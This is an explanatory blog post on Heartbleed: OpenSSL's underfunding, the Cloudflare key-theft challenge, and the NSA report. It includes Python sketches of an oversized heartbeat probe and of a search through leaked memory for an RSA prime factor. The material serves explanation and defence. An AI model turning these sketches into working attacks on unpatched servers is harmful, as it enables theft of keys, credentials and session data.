Last week, during the Heartbleed chaos, I wrote two articles: one outlining how to stay safe and the other explaining what Heartbleed actually is. As we enter this week it is clear that we are far from out of the woods; indeed, I will shortly explain why Heartbleed is going to be around for some time to come. But now that a great deal of patching and password resetting has occurred, it seems like a good time to reflect on a few of the recent revelations: from the accusations that the NSA had Heartbleed for several years and put the Internet community at massive risk, to proof of just how much damage Heartbleed could do (a topic of debate amongst experts last week, despite all agreeing it was ‘bad’). In this article I will review the latest developments and what they mean to you.
How Did All This Heartbleed Chaos Begin?
I’ve received many questions asking exactly this over the weekend. As I covered in my previous article, this is a software defect (not a virus), and unfortunately there is not, and likely never will be, a state of 100% security. Humans make mistakes and technology is far from infallible. That said, in the grand scheme of bugs this one was relatively obvious (at least when compared to the difficulty of finding vulnerabilities and writing exploits on a modern Windows 8.1 system with all of its enhanced anti-exploit mitigations). There are lots of tools and processes that would have turned up such a fault very quickly, yet it went unnoticed for an extended period of time and was adopted into a staggeringly large number of places. Indeed, given the nature of the OpenSSL software (providing crypto services) and its very widespread use, I would genuinely argue that this software should be on the ‘critical national infrastructure’ list for most nations around the world. Given these facts, some have argued that it was an intentional plant (despite the insistence of the programmer who made the mistake to the contrary), but I entirely disagree with this. So how exactly did we end up with such a ‘basic’ bug in such important software (with all due respect to Neel Mehta, who does great work and was diligently looking for such flaws – this is not to downplay the discovery of this significant flaw!)?
The OpenSSL project is open source, which means that the code is available for anyone to review and for those handy with code to contribute to. There is a long-standing debate about the merit of open source versus commercial closed source solutions (I am an advocate of both models in different scenarios), but one of the oft-cited strengths of open source is that anyone can go and check the code and make sure it works well. Unfortunately, as this bug demonstrates, this often translates to a lot of people assuming the code is safe and not actually going and checking it. You can see the thought process of every person adopting it: “well, this is open source, so I am sure lots of really smart people have pored over this code and it is to be trusted”. Unfortunately, the project is very underfunded and under-reviewed given the critical role it plays. The OpenSSL team take donations (with sponsors able to donate up to $50,000), but during the Heartbleed crisis they took a record-breaking $841. Their yearly operating budget is reportedly less than $1 million, and the due diligence, code review and analysis (tools and people) that would have found such problems cost money and time. The answer, therefore, as to who is to blame for this fault is us, the Internet community. Whilst the technology we use is rapidly evolving, blurring open and commercial lines and being woven and mashed together, we need to take stock, identify the critical infrastructure and code that we all depend on and ensure it is appropriately invested in. If you are in a position to help and depend on this code, you may want to consider donating to OpenSSL, or to bug bounty programmes and other projects that drive for code quality.
This is certainly not the first bug like this (though it was one of the more painful ones) and it is very unlikely to be the last — we should all learn our lessons before next time. As I covered in this SANS Institute webcast with Jake Williams and Dr. Johannes Ulrich, this defect will have many (security researchers and cyber criminals alike) poring over this code looking for other such problems – it is a question of when, not if, more defects will be found. Whilst much of the public Internet has now patched, this code is integrated into a huge number of places, many of which change infrequently. It is baked into the firmware of many hardware devices like consumer routers, integrated into medical devices that never see the Internet to update, and even present in critical control environments like utilities. It is clearly going to take some time to tidy this mess, which is precisely why we should learn our lessons before they become more painful.
The Proof Heartbleed Can Do Real Damage
Throughout last week there was a great deal of debate amongst experts as to how much information could really be extracted using the Heartbleed flaw. Whilst everyone agreed it was a nasty fault and that information could be grabbed from memory, opinions varied on what kind of information could be extracted. The Heartbleed flaw, as I outlined in my original article, enables you to retrieve a small amount of information from the remote server’s memory [Technical nerdy awesome bit: you can retrieve about 64KB of memory from the area known as the heap, near the bottom of memory, which is used for a process’s relatively long-standing memory operations compared to the stack. It is divided into chunks which contain information organised and collected by their recent use and by processes using various schemes. Different operating systems use different schemes (or in some cases developers implement their own approach, as per one FreeBSD example for OpenSSL). What you get from memory depends on your position in memory at that time and what was recently handled and stored nearby]. Retrieving memory using Heartbleed is relatively easy, but retrieving useful or interesting information is a lot like jumping on a trampoline whilst throwing a dart blindly at a dart board and hoping you hit the bullseye. Luckily for the attacker, you get lots and lots of attempts at this operation, and sooner or later it is likely to land you something. Using this method you can retrieve usernames, passwords or session IDs (used to separate your connection to Facebook from another logged-in user), which means recently logged-in users may have their details exposed if they still reside in memory when an attacker launches a Heartbleed assault. The more scary scenario is the theft of ‘private keys’ from memory. These are the special secret that a web server uses to encrypt and protect your information in transit – whether it is your Internet banking or your log-in to a social media site.
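To make the mechanics concrete, here is a minimal sketch of the heartbeat message body at the centre of the flaw (per the TLS Heartbeat extension format: a one-byte type, a two-byte claimed payload length, then the payload). This is illustrative only — it omits the surrounding TLS record framing and padding, and the function name is my own:

```python
import struct

def build_heartbeat(claimed_len: int, actual_payload: bytes) -> bytes:
    """Build a TLS heartbeat request body.

    Format: type (1 byte, 0x01 = request), claimed payload length
    (2 bytes, big-endian), then the payload itself. A vulnerable
    server echoes back `claimed_len` bytes starting at the payload,
    regardless of how many bytes were actually sent -- the surplus
    comes from whatever sits in adjacent heap memory.
    """
    return struct.pack(">BH", 0x01, claimed_len) + actual_payload

# An honest heartbeat: the claimed length matches the real payload.
honest = build_heartbeat(4, b"ping")

# A Heartbleed probe: claim the maximum (~64KB) but send no payload,
# so a vulnerable server replies with up to 65535 bytes of heap data.
malicious = build_heartbeat(0xFFFF, b"")
```

The entire bug boils down to the server trusting that two-byte claimed length instead of checking it against the bytes actually received; the fix was a single bounds check.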
If an attacker could retrieve these, then they could continue intercepting users’ traffic to that site (for example, from this coffee shop where I am now sat) and spying on them even after Heartbleed was patched. This is why the steps to fix Heartbleed I outlined include creating a new private key and certificate – it is safer to assume they have been stolen. In an innovative move, last week Cloudflare set up a challenge server which was intentionally vulnerable to Heartbleed and challenged the Internet community to steal the private keys (and prove it!). This is exactly what happened: at the time of writing, two different users have already retrieved the keys, with many others stealing password hashes and other sensitive data along the way.
In short, using a variety of methods and a bit of pot luck, it is possible under certain conditions to steal keys that would allow an attacker to decrypt user information going forwards (and backwards, if they had captured a copy of it), which entirely validates the steps to fix Heartbleed, including key regeneration.
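One of the key-hunting tricks reportedly used against the Cloudflare challenge can be sketched very simply: an RSA private key is built from two secret primes whose product is the public modulus, so you can slide a window over leaked heap bytes and test whether any window, read as an integer, exactly divides the modulus. The numbers below are deliberately tiny toys, not a real key, and the function is my own illustration rather than any published tool:

```python
def find_prime_factor(n, leaked, width):
    """Slide a window over leaked memory; return a candidate byte run
    that, interpreted as a little-endian integer, divides n exactly.
    Any such divisor is one of the secret primes behind an RSA key."""
    for i in range(len(leaked) - width + 1):
        candidate = int.from_bytes(leaked[i:i + width], "little")
        # Skip trivial candidates before the divisibility test:
        # real RSA primes are odd and greater than 1.
        if candidate > 1 and candidate % 2 == 1 and n % candidate == 0:
            return candidate
    return None

# Toy demo: n = 61 * 53; pretend the byte 61 turned up in a leaked chunk.
n = 61 * 53
leak = b"\x00junk" + (61).to_bytes(1, "little") + b"more\x00"
p = find_prime_factor(n, leak, 1)  # finds 61, one of the two secret primes
```

In practice the windows are hundreds of bytes wide and millions of leaked chunks are scanned, but the principle is the same: the attacker never needs the whole key, just one prime, because the rest can be recomputed from it and the public certificate.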
Did The NSA Have, Use And Fail To Notify The Public About Heartbleed For Years?
Lastly, Bloomberg reported that the NSA had access to the Heartbleed vulnerability for an extended period of time prior to the public disclosure. This aligns with many of the theories circulating amongst security professionals after the ‘NSA revelations’ of the last 18 months. It is certainly possible that intelligence agencies (not just the NSA) had access to such a vulnerability and were systematically using it for some time. That said, Bloomberg doesn’t cite a source (as yet), and the report has been met with some of the fastest and most strongly worded rejections from the NSA and the ODNI (Office of the Director of National Intelligence). In most scenarios a ‘no comment’ is the typical response, so this fast and outright denial seems atypical. I personally suspect that is because they genuinely did not know about it, as opposed to lying about it and trying to cover it up (I could be wrong, I have no proof, it is entirely opinion). What is it that makes me hold this opinion? Simply put, the level of damage on an international scale such a bug could do. Whilst such agencies have a directive towards collecting intelligence, they also have a duty to protect. Any such vulnerability would likely have been through a risk assessment in which the intelligence value and the potential damage were weighed up, and I would find it surprising if the choice was made to keep it a secret rather than remediate it. I am sure (as seems to be the case with most NSA-related theories of late) more information will come to light shortly, but for now I’m sticking with this being less likely in this instance.
That is it for this week’s summary on Heartbleed. It certainly looks like the number of systems still vulnerable (on the public Internet) is rapidly reducing, and new security topics are likely to take the headlines soon. Given the news of vulnerable routers, however, I suspect we will be seeing this flaw for quite some time. If you have any questions, please leave a comment or ask me on Twitter, @jameslyne.